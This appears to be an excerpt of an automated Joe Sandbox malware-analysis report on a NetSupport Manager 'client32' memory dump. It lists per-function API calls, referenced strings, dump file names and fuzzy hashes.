\\.\pipe\nsm_vistapipe%d, xrefs: 110F5E68
\\.\pipe\nsm_%s, xrefs: 110F5E24

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateExchangeInterlockedNamedPipewsprintf$DescriptorErrorEventFileLastLocalSecuritySleep$AllocDaclFreeInitializeReadState
String ID: VistaUIPipe%d$\\.\pipe\nsm_%s$\\.\pipe\nsm_vistapipe%d
API String ID: 314772441-3428003663
Opcode ID: e7bcf5fa35c7ae0bf6533db28daa5190e3dca5c24372e205fe16bd6319992667
Instruction ID: fbe750a4f2b50bf2a05bba8475ff7f8da2e2a8aeb6fabcdf6cb919c50166342f
Opcode Fuzzy Hash: e7bcf5fa35c7ae0bf6533db28daa5190e3dca5c24372e205fe16bd6319992667
Instruction Fuzzy Hash: 6861A071A4022AABD714CFA0CD85FD9F7B8BF48714F1041E4F9549B644EBB4A984CFA0

Function 1105F830 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 340COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1105F890
wsprintfA.USER32 ref: 1105F8A4
wsprintfA.USER32 ref: 1105F8FF
ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000,?,80000002,?,00020019), ref: 1105F97F

Strings

\, xrefs: 1105FA5A
NetSupport School, xrefs: 1105FCFD
%s\%s, xrefs: 1105F878, 1105F89E, 1105FAE6
ConfigList, xrefs: 1105FADA
NSM, xrefs: 1105F8ED, 1105F8F2
General\ProductId, xrefs: 1105FB8D
NSS, xrefs: 1105F8E6
HKLM, xrefs: 1105FA01
Software\NetSupport Ltd, xrefs: 1105F893
%sUseHKLM, xrefs: 1105F8F9
Software\Productive Computer Insight, xrefs: 1105F86D
NetSupport School Pro, xrefs: 1105FCE1
HKCU, xrefs: 1105FA48

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$EnvironmentExpandStrings
String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
API String ID: 2608976442-3241390832
Opcode ID: 0a402962c74e1168fa335cb8fc9f1d35beb35a49c915ce1fd9ba50aaefa48d8b
Instruction ID: e96a2cbbb3b754be6409a963181338f47424fc131a1cec65b85ff3420bffa3c7
Opcode Fuzzy Hash: 0a402962c74e1168fa335cb8fc9f1d35beb35a49c915ce1fd9ba50aaefa48d8b
Instruction Fuzzy Hash: 89D1C375D0126EAEDB61DB64DD54BDEB7B8AF19309F0000D8D909A3181FB746B84CFA2

Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

wsprintfA.USER32 ref: 110EB5D8
GetTickCount.KERNEL32 ref: 110EB632
SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
GetTickCount.KERNEL32 ref: 110EB64E
SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC

Strings

Warning: SendMessage to Runplugin took %d ms (possibly unresponsive), xrefs: 110EB65A
Error. Runplugin is unresponsive, xrefs: 110EB6E2
runplugin.dmp.1, xrefs: 110EB6BF
runplugin %s (hWnd=%x,u=%d,64=%d) , xrefs: 110EB5D2
%s, xrefs: 110EB603
TracePlugins, xrefs: 110EB560
DATA, xrefs: 110EB586
_debug, xrefs: 110EB56D
INIT, xrefs: 110EB57C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
API String ID: 3451743168-2289091950
Opcode ID: 428bc3a6ffd866025922a5144c04f30853499b8fa9896ab544192c7afab27f2a
Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
Opcode Fuzzy Hash: 428bc3a6ffd866025922a5144c04f30853499b8fa9896ab544192c7afab27f2a
Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1

Function 11071B60 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 322sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D

EnableWindow.USER32(00000000,00000000), ref: 11071BAB

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

CloseHandle.KERNEL32(00000000,11071A10,00000001,00000000), ref: 11071C1A
_memset.LIBCMT ref: 11071C62
GetTickCount.KERNEL32 ref: 11071C73
GetTickCount.KERNEL32 ref: 11071C7C
GetTickCount.KERNEL32 ref: 11071C95
Sleep.KERNEL32(?,?,?,00000002), ref: 11071CD8
Sleep.KERNEL32(0000000A,?,?,00000002), ref: 11071D2D
GetTickCount.KERNEL32 ref: 11071E78

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

Strings

, xrefs: 11071E3E
gfff, xrefs: 11071CB6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Window$Sleep_memset$CloseCreateEnableEventHandle_mallocwsprintf
String ID: $gfff
API String ID: 891474222-257315895
Opcode ID: ffae8c4176452a80d178b5edbdad7732fb7d630ec6d65e8ef89ceb6d20875923
Instruction ID: 513feb5f7381e08072cb6c26fa2f18ad4f0fb6e6a3d9412ac9f35556057935f0
Opcode Fuzzy Hash: ffae8c4176452a80d178b5edbdad7732fb7d630ec6d65e8ef89ceb6d20875923
Instruction Fuzzy Hash: 11C1BD74B003159FEB24DF64CD81BAAB7B6FF88704F1085A8E556AB3C0DB74A941CB45

Function 110398B0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000044D), ref: 110398CC
IsWindowVisible.USER32(00000000), ref: 110398CF
GetDlgItem.USER32(?,0000044F), ref: 110398F8
IsWindowVisible.USER32(00000000), ref: 110398FB
GetDlgItem.USER32(?,000004BE), ref: 11039928
IsWindowVisible.USER32(00000000), ref: 1103992B
GetDlgItem.USER32(?,000017EC), ref: 11039958
IsWindowVisible.USER32(00000000), ref: 1103995B
GetDlgItem.USER32(?,0000048D), ref: 11039988
IsWindowVisible.USER32(00000000), ref: 1103998B
GetDlgItem.USER32(?,0000048E), ref: 110399B8
IsWindowVisible.USER32(00000000), ref: 110399BB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDlgItem.USER32(00000000,00000001), ref: 11039A02
EnableWindow.USER32(00000000,00000001), ref: 11039A06

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 110399EA
m_hWnd, xrefs: 110399EF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemWindow$Visible$EnableErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 2531669725-1986719024
Opcode ID: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
Instruction ID: c605c523e88007737b9d27236d90d9a53477605ae0cc304b47ea9e042cf8b0eb
Opcode Fuzzy Hash: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
Instruction Fuzzy Hash: EA4195757407056FF624DAA9CD81F1AB7DAABC8B40F208518F769DB3C0EEB0E8408758

Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

GetDlgItem.USER32(00000000,00000001), ref: 1103944A
EnableWindow.USER32(00000000,00000000), ref: 1103944F
_calloc.LIBCMT ref: 1103945C
GetSystemMenu.USER32(?,00000000), ref: 11039490
EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
UpdateWindow.USER32(00000000), ref: 11039567
BringWindowToTop.USER32(?), ref: 1103956E

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 1115FFC0: SetForegroundWindow.USER32(00000000), ref: 1115FFEE

MessageBeep.USER32(000000FF), ref: 1103957F

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1103942B
m_hWnd, xrefs: 11039430, 110394E6, 1103951B, 11039556
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110394E1, 11039516, 11039551
CLTCONN.CPP, xrefs: 11039470
m_nc, xrefs: 11039475

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
API String ID: 4191401721-1182766118
Opcode ID: 5067699e0dccafa969c086d1f08fbb4036bf4fa65290f807bd1e681cf6c5699e
Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
Opcode Fuzzy Hash: 5067699e0dccafa969c086d1f08fbb4036bf4fa65290f807bd1e681cf6c5699e
Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759

Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
RegisterClassExA.USER32(?), ref: 110CB4F2
_memset.LIBCMT ref: 110CB51B
GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
RegisterClassExA.USER32(?), ref: 110CB58C
LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB

Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48

Strings

WM_ATLGETCONTROL, xrefs: 110CB471
WM_ATLGETHOST, xrefs: 110CB46A
AtlAxWinLic100, xrefs: 110CB52D, 110CB582
AtlAxWin100, xrefs: 110CB492, 110CB4E8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 2220097787-1587594278
Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4

Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 11003691

Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111

CreateSolidBrush.GDI32(00000000), ref: 110036A5
GetStockObject.GDI32(00000007), ref: 110036B0
SelectObject.GDI32(?,00000000), ref: 110036BB
SelectObject.GDI32(?,?), ref: 110036CC
GetSysColor.USER32(00000010), ref: 110036DC
GetSysColor.USER32(00000010), ref: 110036F3
GetSysColor.USER32(00000014), ref: 1100370A
GetSysColor.USER32(00000014), ref: 11003721
GetSysColor.USER32(00000014), ref: 1100373E
GetSysColor.USER32(00000014), ref: 11003755
GetSysColor.USER32(00000010), ref: 1100376C
GetSysColor.USER32(00000010), ref: 11003783
InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
SelectObject.GDI32(?,?), ref: 110037CE
SelectObject.GDI32(?,?), ref: 110037D8
DeleteObject.GDI32(?), ref: 110037DE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
String ID:
API String ID: 3698065672-0
Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1

Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,B6DE5DE1,?,?), ref: 1104B8F6
_sprintf.LIBCMT ref: 1104B923

Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19

_strncpy.LIBCMT ref: 1104BACE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

FailedAttacks, xrefs: 1104B8CE, 1104B8E2
@ %s, xrefs: 1104B979
IsA(), xrefs: 1104B9A5, 1104B9E9
*** Warning. Failed Attack %u, from %s, at %s, xrefs: 1104BA02
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1104B9A0, 1104B9E4
%04d/%02d/%02d %02d:%02d:%02d, xrefs: 1104B91D
LastAttacker, xrefs: 1104B9BB
LastAttack, xrefs: 1104B931
Info. Connection Rejected, reason=%d, xrefs: 1104B83C
NC-, xrefs: 1104BAC4
Software\Productive Computer Insight\Client32, xrefs: 1104B8B3
%s, %d, xrefs: 1104B869

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
